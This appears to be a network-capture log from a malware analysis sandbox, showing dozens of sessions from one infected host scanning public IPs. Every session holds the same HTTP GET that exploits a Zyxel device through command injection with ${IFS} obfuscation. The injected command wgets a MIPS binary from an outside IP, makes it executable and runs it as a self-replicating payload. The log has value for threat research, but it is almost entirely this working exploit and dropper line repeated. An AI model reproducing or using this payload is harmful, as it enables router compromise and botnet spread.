                                    Jan 13, 2024 19:02:49.537152052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8258192.168.2.1339328209.117.58.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.537214041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8259192.168.2.135769437.26.184.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.537273884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8260192.168.2.134441443.233.139.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.537312031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8261192.168.2.1345312116.249.132.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.537384033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8262192.168.2.134995868.153.40.158443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.537422895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8263192.168.2.1341204165.19.232.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.537482977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8264192.168.2.133652458.241.139.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.537558079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8265192.168.2.1348074211.187.212.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.537597895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8266192.168.2.1346828199.65.8.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.537693024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8267192.168.2.1345404130.210.129.189443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.537730932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8268192.168.2.136055414.11.70.44443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.537775993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8269192.168.2.134073670.144.204.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.537844896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8270192.168.2.1338982175.109.115.104443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.537899017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8271192.168.2.134820257.160.186.103443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.537959099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8272192.168.2.134387687.57.46.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.538012028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8273192.168.2.134913465.164.210.124443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.538063049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8274192.168.2.135713474.71.212.36443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.538098097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8275192.168.2.134398054.104.141.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.538151979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8276192.168.2.134169896.233.202.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.538213015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8277192.168.2.1334990184.19.134.248443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.538255930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8278192.168.2.133851225.34.72.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.538300037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8279192.168.2.1338032132.47.200.124443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.538338900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8280192.168.2.1356896193.13.197.15443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.538397074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8281192.168.2.135593082.7.200.68443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.538479090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8282192.168.2.1338980206.199.223.52443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.538563967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8283192.168.2.1343206116.83.82.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.538572073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8284192.168.2.135396099.248.201.103443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.538620949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8285192.168.2.133346666.149.86.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.538678885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8286192.168.2.1333984184.217.117.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.538750887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8287192.168.2.1353950184.249.48.193443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.538789988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8288192.168.2.1347444197.182.213.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.538821936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8289192.168.2.133569643.18.138.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.538865089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8290192.168.2.1338456142.219.161.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.538912058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8291192.168.2.1348160212.244.57.20443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.538975954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8292192.168.2.133996449.40.70.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.539014101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8293192.168.2.1360186211.51.43.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.539051056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8294192.168.2.1339284175.246.29.146443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.539119959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8295192.168.2.1341224123.70.252.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.539150000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8296192.168.2.135664018.68.222.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.539225101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8297192.168.2.134136075.36.64.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.539282084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8298192.168.2.134285054.116.233.250443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.539321899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8299192.168.2.134908695.68.101.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.539400101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8300192.168.2.134239242.120.180.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.539454937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8301192.168.2.1337706136.126.87.155443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.539527893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8302192.168.2.1345258135.76.101.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.539598942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8303192.168.2.134413849.36.78.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.539650917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8304192.168.2.1357264129.47.26.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.539710999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8305192.168.2.1347210137.102.156.103443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.539797068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8306192.168.2.1345592187.99.49.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.539860010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8307192.168.2.1345534179.176.90.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.539896965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8308192.168.2.1338368223.81.240.57443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.539968967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8309192.168.2.135330277.99.202.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.540030003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8310192.168.2.1341708209.74.44.210443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.540103912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8311192.168.2.13456382.111.229.7443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.540141106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8312192.168.2.135109636.8.12.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.540177107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8313192.168.2.1344996143.203.133.123443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.540216923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8314192.168.2.1359530212.219.129.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.540277004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8315192.168.2.1338070115.64.26.47443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.540333033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8316192.168.2.1354220169.135.75.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.540396929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8317192.168.2.133581035.69.176.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.540450096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8318192.168.2.1345314202.184.248.109443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.540462971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8319192.168.2.134335067.229.246.109443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.540513992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8320192.168.2.1344052104.126.103.44443
                                    TimestampBytes transferredDirectionData
